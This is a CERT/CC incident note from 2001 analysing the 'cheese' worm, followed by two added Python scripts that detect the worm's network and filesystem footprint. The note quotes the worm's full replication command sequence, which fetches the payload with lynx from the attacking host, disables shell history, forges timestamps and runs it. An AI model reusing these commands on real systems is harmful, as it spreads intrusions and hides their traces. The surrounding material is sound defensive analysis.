<p>The CERT Coordination Center publishes incident notes to provide information about incidents to the Internet community.</p>

<h2>The "cheese" Worm</h2>

<p>Date: Thursday, May 17, 2001</p>

<h3>Overview</h3>

<p>The CERT/CC has observed in public and private reports a recent pattern of activity surrounding probes to TCP port 10008. We have obtained an artifact called the 'cheese worm' which may contribute to the pattern.</p>

<h3>Description</h3>

<p>The 'cheese worm' is a worm designed to remove all inetd services referencing '/bin/sh' from systems with root shells listening on TCP port 10008. In reality, the 'cheese worm' will attempt to execute a series of shell commands on any host which accepts TCP connections on TCP port 10008.</p>

<p>The 'cheese worm' perpetuates its attack cycle across multiple hosts by copying itself from attacking host to victim host and self-initiating another attack cycle. Thus, no human intervention is required to perpetuate the cycle once the worm has begun to propagate.</p>

<p><b>Contents:</b></p>

<font face="Courier New">
<pre>
MD5 Checksum                      Filesize  Filename
-------------------------------------------------------
c6a0feb1b1723493fe504148df4fc0af      2381  cheese
a87a2a8c31cfe38af309e173c2257158        47  go
0093fdcb12b6fb836495b7cd53d19ddb     15471  psm
</pre>
</font>

<p><b>Attack Sequence:</b></p>

<p>In examples we have seen, the contents of the 'cheese worm' are installed in '/tmp/.cheese' and that directory is the working directory as commands are executed.</p>

<p>The attack sequence is initiated with the execution of the shell script 'go' on the attacking host.</p>
<p>'go' simply executes the perl script 'cheese':</p>

<font face="Courier New">
<pre>
/tmp/.cheese/go:
#!/bin/sh
nohup ./cheese $1 1>/dev/null 2>&1 &
</pre>
</font>

<p>The 'cheese' script does the following:</p>

<ul>
<li>changes its process name to 'httpd'</li>
<li>deletes the 'go' script</li>
<li>checks for a file named 'ADL' in the working directory
  <ul>
  <li>if found, 'cheese' exits</li>
  <li>if not found, the 'ADL' file is created, the string 'ADL' is written into the file, and the timestamp is set to match the timestamp of the system's '/bin/ls' file</li>
  </ul>
</li>
<li>reads '/etc/inetd.conf' and rewrites it excluding any line that contains the string '/bin/sh'</li>
<li>attempts to restart inetd twice, once using '/usr/bin/killall' and once using '/bin/killall'</li>
<li>until the 'cheese' process is somehow killed, it repeats a cycle of scanning semi-random /16 (e.g., class B) network blocks for hosts listening on TCP port 10008 using the 'psm' program.
  <ul>
  <li>the first octet of the address may be from 193 to 218</li>
  <li>the second octet of the address may be from 1 to 254</li>
  </ul>
</li>
</ul>

<p>On hosts responding to a probe on TCP port 10008, the worm</p>

<ul>
<li>establishes a TCP connection to port 10008 of the victim host</li>
<li>starts a listener process on a random TCP socket number from 10000 through 15000
  <ul>
  <li>the listener process will send a copy of '/tmp/.cheese/cheese.uue' to anything that provides two linefeeds after connecting to its TCP socket</li>
  </ul>
</li>
<li>sends the following commands to the victim host on TCP port 10008 (word wrapped for readability)</li>
</ul>

<font face="Courier New">
<dl>
<dd>export TERM=vt100 ;</dd>
<dd>export PATH=\"/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin\" ;</dd>
<dd>export HISTFILE=/dev/null ;</dd>
<dd>mkdir /tmp/.cheese ;</dd>
<dd>touch -r /bin/sh /tmp/.cheese ;</dd>
<dd>cd /tmp/.cheese ;</dd>
<dd>lynx -source http://$li:$rp/ >cheese.uue ;</dd>
</dl>
</font>
<font face="Courier New">
<dl>
<dd>uudecode cheese.uue ;</dd>
<dd>tar zxvf cheese.tgz ;</dd>
<dd>rm -f cheese.tgz ;</dd>
<dd>touch -r /bin/sh * ;</dd>
<dd>chmod 755 * ;</dd>
<dd>./go $mhih ;</dd>
<dd>exit ;</dd>
</dl>
</font>

<ul>
<li>'$li' contains the IP address of the local system</li>
<li>'$rp' is the TCP port on the local system for the listener</li>
<li>'$mhih' is the IP address of the victim host</li>
</ul>

<p>If successfully executed on the victim host, these commands cause a copy of the 'cheese worm' (e.g., cheese.uue) to be downloaded, installed, and executed on the victim host.</p>

<ul>
<li>terminates the listener process</li>
</ul>

<h3>Impact</h3>

<p><b>Network Footprint:</b></p>

<p>A host running an active instance of the 'cheese worm' will</p>

<ul>
<li>scan TCP port 10008 on remote /16 network blocks</li>
<li>initiate TCP connections to TCP port 10008 on victim hosts</li>
<li>receive a TCP connection on a TCP port number from 10000 through 15000 when the worm replicates to a victim host</li>
</ul>

<p>A victim host being compromised by the 'cheese worm' will</p>

<ul>
<li>receive a probe to TCP port 10008 from the attacking host</li>
<li>receive a TCP connection to port 10008 from the attacking host</li>
<li>initiate a TCP connection to a TCP port number from 10000 to 15000 on the attacking host</li>
<li>begin the attack cycle of an active 'cheese worm' host</li>
</ul>

<p><b>System Footprint:</b></p>

<p>The following files may be found on a system impacted by the 'cheese worm':</p>

<dl>
<dd>/tmp/.cheese/</dd>
<dd>/tmp/.cheese/ADL</dd>
<dd>/tmp/.cheese/go</dd>
<dd>/tmp/.cheese/cheese</dd>
<dd>/tmp/.cheese/psm</dd>
<dd>/tmp/.cheese/cheese.uue</dd>
<dd>/tmp/.cheese/cheese.tgz</dd>
</dl>

<p>The following files may be modified:</p>

<dl>
<dd>/etc/inetd.conf</dd>
</dl>

<p>The following services may be restarted:</p>

<dl>
<dd>inetd</dd>
</dl>

<p>The 'cheese worm' relies on an exposed, unauthenticated, privileged shell
listening on TCP port 10008 to alter a system and perpetuate its attack cycle. As such, the presence of the 'cheese worm' on a system implies an insecure system configuration or a previous system compromise.</p>

<h3>Solutions</h3>

<p>The CERT/CC encourages sites to review hosts infected with the 'cheese worm' for other signs of intrusion and take appropriate steps to ensure the security of impacted systems.</p>

<p>In particular, certain versions of the BIND TSIG exploit discussed in</p>

<dl>
<dd><a href="/incident_notes/IN-2001-03.html">IN-2001-03</a>, Exploitation of BIND Vulnerabilities</dd>
</dl>

<p>create a backdoor root shell on TCP port 10008. Such an exploit was bundled into at least one version of the '1i0n' worm. A detailed analysis of the '1i0n' worm was published by Max Vision and is available at</p>

<dl>
<dd><a href="http://www.whitehats.com/library/worms/lion/index.html">http://www.whitehats.com/library/worms/lion/index.html</a></dd>
</dl>

<p>The <a href="http://certcc.or.kr/">Korea Computer Emergency Response Team Coordination Center (CERTCC-KR)</a> has published <a href="http://www.certcc.or.kr/paper/incident_note/2001/in2001_007.html">CERTCC-KR-IN-01-007</a> discussing the 'cheese' worm in Korean.</p>

<p>If you believe a host under your control has been compromised, you may wish to refer to</p>

<dl>
<dd><a href="/tech_tips/root_compromise.html">Steps for Recovering From a Root Compromise</a></dd>
</dl>

<h3>Acknowledgement</h3>

<p>The CERT/CC thanks <a href="http://www.certcc.or.kr/">CERTCC-KR</a> for their contributions to this Incident Note.</p>

<p><b>Author</b>: <a href="mailto:cert@cert.org?subject=IN-2001-05%20Feedback">Kevin Houle</a></p>

<p>Copyright 2001 Carnegie Mellon University.</p>
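<p>The Network Footprint section above describes two things a packet-filter log should show for a 'cheese worm' host: a sweep of a /16 on TCP port 10008, and a victim connecting back to the worm host on a port in the 10000 to 15000 range shortly after the worm connected to the victim's port 10008. The following is an added example, not code from the CERT/CC note; it assumes a constructed, iptables-like <code>SRC= DST= PROTO= SPT= DPT=</code> log line format, and the addresses in the sample log are made up.</p>

```python
"""Detect the 'cheese worm' network footprint in connection logs (added example).

The log format is a constructed, iptables-like line; adjust LINE_RE for a
real packet filter's format.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) "
    r"PROTO=TCP SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)"
)

# Constructed sample: 203.0.113.7 plays the worm host, 198.51.100.5 the victim.
SAMPLE_LOG = [
    # the 'psm' sweep: ten hosts of 198.51.0.0/16 probed on TCP/10008
    *[f"2001-05-17T10:00:{i:02d} SRC=203.0.113.7 DST=198.51.100.{i} "
      f"PROTO=TCP SPT=3{i:03d} DPT=10008" for i in range(1, 11)],
    # the victim answered; the worm connects again to send its command string
    "2001-05-17T10:00:20 SRC=203.0.113.7 DST=198.51.100.5 PROTO=TCP SPT=3100 DPT=10008",
    # the victim fetches cheese.uue from the worm's listener (port 10000-15000)
    "2001-05-17T10:00:25 SRC=198.51.100.5 DST=203.0.113.7 PROTO=TCP SPT=1025 DPT=12345",
    # unrelated traffic that must not be flagged
    "2001-05-17T10:01:00 SRC=192.0.2.50 DST=198.51.100.5 PROTO=TCP SPT=4000 DPT=10008",
    "2001-05-17T10:01:05 SRC=192.0.2.60 DST=203.0.113.7 PROTO=TCP SPT=4001 DPT=10500",
]


def parse_line(line):
    """Return a record dict for one log line, or None if it is not a TCP entry."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"], "dst": m["dst"],
            "spt": int(m["spt"]), "dpt": int(m["dpt"])}


def parse_log(lines):
    return [r for r in map(parse_line, lines) if r is not None]


def slash16(ip):
    """The /16 block an address belongs to, e.g. '198.51' for 198.51.100.5."""
    return ".".join(ip.split(".")[:2])


def find_port10008_scanners(records, min_hosts=8):
    """Sources that probed at least min_hosts distinct addresses on TCP/10008
    inside a single /16, which is how the worm's sweep looks from outside."""
    targets = defaultdict(set)          # (source, /16) -> probed addresses
    for r in records:
        if r["dpt"] == 10008:
            targets[(r["src"], slash16(r["dst"]))].add(r["dst"])
    return sorted({src for (src, _), dsts in targets.items() if len(dsts) >= min_hosts})


def find_replication_pairs(records, window=timedelta(minutes=5)):
    """(attacker, victim) pairs showing the replication handshake: attacker -> victim:10008
    followed, within window, by victim -> attacker on a port in 10000-15000."""
    shell_conns = [r for r in records if r["dpt"] == 10008]
    pairs = set()
    for back in records:
        if not 10000 <= back["dpt"] <= 15000:
            continue
        for fwd in shell_conns:
            if (fwd["src"] == back["dst"] and fwd["dst"] == back["src"]
                    and timedelta(0) <= back["ts"] - fwd["ts"] <= window):
                pairs.add((fwd["src"], fwd["dst"]))
    return sorted(pairs)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("port 10008 sweepers:", find_port10008_scanners(recs))
    print("replication pairs:  ", find_replication_pairs(recs))
```

<p>The single connection from 192.0.2.50 to port 10008 is not reported by either check: one probe is not a sweep, and with no connection back to 192.0.2.50 on 10000 to 15000 there is no replication pair. The <code>min_hosts</code> threshold and the time window are tuning knobs, not values from the note.</p>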
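<p>The System Footprint section lists the files the worm leaves behind and notes two details worth checking directly: the 'ADL' marker is timestamped with <code>touch -r /bin/ls</code>, and the exposure the worm relies on is an inetd entry that runs '/bin/sh'. The following is an added example, not code from the CERT/CC note; it examines a tree under a chosen root (so a mounted image or copied filesystem can be checked offline) and builds a constructed fixture for demonstration. The fixture's inetd.conf service entry and the demo paths are made up.</p>

```python
"""Check a filesystem tree for the 'cheese worm' system footprint (added example)."""
import os
import tempfile

# Paths listed under "System Footprint" in the CERT/CC note.
WORM_PATHS = [
    "/tmp/.cheese", "/tmp/.cheese/ADL", "/tmp/.cheese/go", "/tmp/.cheese/cheese",
    "/tmp/.cheese/psm", "/tmp/.cheese/cheese.uue", "/tmp/.cheese/cheese.tgz",
]


def _under(root, path):
    return os.path.join(root, path.lstrip("/"))


def check_cheese_footprint(root="/"):
    """Return human-readable findings for the tree rooted at `root`."""
    findings = []
    for rel in WORM_PATHS:
        if os.path.lexists(_under(root, rel)):
            findings.append(f"present: {rel}")

    # The worm forges ADL's timestamp with 'touch -r /bin/ls', so an ADL whose
    # mtime equals /bin/ls exactly is a stronger signal than its name alone.
    adl, ls = _under(root, "/tmp/.cheese/ADL"), _under(root, "/bin/ls")
    if (os.path.isfile(adl) and os.path.isfile(ls)
            and os.stat(adl).st_mtime_ns == os.stat(ls).st_mtime_ns):
        findings.append("timestamp: /tmp/.cheese/ADL mtime equals /bin/ls (touch -r)")

    # An inetd entry whose server is /bin/sh is the exposed root shell the worm
    # relies on. The worm deletes such lines once it lands, so a clean
    # inetd.conf does not clear a host that already shows the files above.
    inetd = _under(root, "/etc/inetd.conf")
    if os.path.isfile(inetd):
        with open(inetd) as fh:
            for n, line in enumerate(fh, 1):
                s = line.strip()
                if s and not s.startswith("#") and "/bin/sh" in s:
                    findings.append(f"inetd.conf line {n} runs /bin/sh: {s}")
    return findings


def build_sample_root(base, infected):
    """Constructed fixture: a minimal tree with /bin/ls, /bin/sh and an
    inetd.conf, plus the worm's working directory when `infected` is set."""
    os.makedirs(os.path.join(base, "bin"))
    os.makedirs(os.path.join(base, "etc"))
    for name in ("ls", "sh"):
        open(os.path.join(base, "bin", name), "w").close()
    conf = ["# constructed inetd.conf",
            "ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd"]
    if infected:
        conf.append("svc10008 stream tcp nowait root /bin/sh sh")  # constructed entry
        work = os.path.join(base, "tmp", ".cheese")
        os.makedirs(work)
        for name in ("ADL", "cheese", "psm"):
            open(os.path.join(work, name), "w").close()
        st = os.stat(os.path.join(base, "bin", "ls"))
        os.utime(os.path.join(work, "ADL"), ns=(st.st_atime_ns, st.st_mtime_ns))
    with open(os.path.join(base, "etc", "inetd.conf"), "w") as fh:
        fh.write("\n".join(conf) + "\n")


def demo(infected=True):
    """Build the fixture in a temporary directory and return the findings."""
    with tempfile.TemporaryDirectory() as base:
        build_sample_root(base, infected)
        return check_cheese_footprint(base)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

<p>Running <code>check_cheese_footprint()</code> with the default root examines the live system; the fixture exists only so the checks can be exercised without an infected host. Absence of every finding is not proof of a clean system, since the worm removes 'go' and the inetd lines it finds, and 'cheese.uue' and 'cheese.tgz' are deleted or may be overwritten during installation.</p>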